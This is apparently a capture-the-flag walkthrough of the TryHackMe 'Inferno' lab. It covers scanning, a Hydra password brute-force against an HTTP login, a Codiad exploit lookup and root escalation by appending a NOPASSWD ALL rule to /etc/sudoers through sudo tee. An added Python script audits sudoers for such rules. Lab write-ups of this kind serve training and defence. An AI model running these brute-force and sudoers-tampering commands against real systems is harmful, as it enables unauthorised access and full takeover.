TryHackMe: Inferno

Today we will take a look at TryHackMe: Inferno. Please try to understand each step and take notes. Try to take quick and careful steps, because demons will take you out often ;)

Information Gathering

> Image analysis

view-source:http://10.10.223.163/1.jpg

First of all, let's download the image and search it.

We found the name Dante. We need to save it.

Enumeration/Scanning

> Nmap

sudo nmap -sS -sC -sV -oN nmap/initial 10.10.223.163

We found many open ports.

I think this is a scam.

> Gobuster

gobuster dir -u http://10.10.223.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

But when we enter the site, we encounter authentication.

Time to start Hydra.

Exploitation

Let's attack with Hydra. As usernames, I will use admin and root, which are used as default credentials, next to the dante we found earlier.

Command: hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 10.10.39.231 http-get /i****** -V -I -t 64

And here's the password, which we could also have found by guessing :)

Admin panel

Log in with the same username and password.

> Get reverse shell

The admin panel is Codiad. Let's look for an exploit.

Command: searchsploit codiad

Command: searchsploit -m multiple/webapps/50474.txt

But I wanted to do it through the admin panel.

> Get reverse shell

If we search inside, we see an interesting .dat file in the downloads folder.

Command: ls -la *

I saw it was hex and turned it into text.

> We found the username and password. Try to log in with SSH.

You are racing against time while working on the machine, because demons will take you out. Think and decide as quickly as possible.

List the commands that we are allowed to run with sudo.

Command: sudo -l

We can run “tee” as SUDO.

Command: echo "ALL ALL=NOPASSWD: ALL" | sudo tee -a /etc/sudoers

Privilege escalation

And now we are root.
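
From the defender's side, this escalation works because tee run through sudo can append to any root-owned file, /etc/sudoers included. The Python audit below is an added example, not part of the original writeup; the sample sudoers text, the account names in it and the WRITE_CAPABLE list are constructed assumptions.

```python
import re

# Assumed, non-exhaustive list of binaries that can write arbitrary files.
WRITE_CAPABLE = {"tee", "cp", "mv", "dd", "sed", "vim", "nano"}
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?P<spec>.+)$")

def audit_sudoers(text):
    """Return (line_no, who, finding) for rules that amount to root access."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # Skip comments, include directives, Defaults and alias definitions.
        if not line or line.startswith(("#", "@", "Defaults")) or "_Alias" in line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        spec = re.sub(r"\([^)]*\)", "", m["spec"])  # drop (runas) lists
        nopasswd = "NOPASSWD:" in spec
        spec = re.sub(r"\b[A-Z_]+:", "", spec)       # drop tags such as NOPASSWD:
        for cmd in (c.strip() for c in spec.split(",")):
            parts = cmd.split()
            if not parts:
                continue
            binary = parts[0].rsplit("/", 1)[-1]
            if cmd == "ALL" and (nopasswd or m["who"] == "ALL"):
                # Every command as root, without a password or for every user.
                findings.append((no, m["who"], "blanket:ALL"))
            elif binary in WRITE_CAPABLE and (len(parts) == 1 or "*" in cmd):
                # No fixed arguments: the caller chooses which file gets written.
                findings.append((no, m["who"], "write:" + binary))
    return findings

# Constructed sample: line 5 is the weak rule, line 7 is what the tee append leaves behind.
SAMPLE = """\
# constructed sudoers content for illustration
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
svcuser ALL=(root) NOPASSWD: /usr/bin/tee
backup ALL=(root) NOPASSWD: /usr/bin/tee /var/log/backup.log
ALL ALL=NOPASSWD: ALL
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print(finding)
```

The rule on line 6 of the sample is not flagged because sudo only permits the exact arguments listed, so the caller cannot redirect the write to another file.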

“If you have any questions or comments, please do not hesitate to write. Have a good day”


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
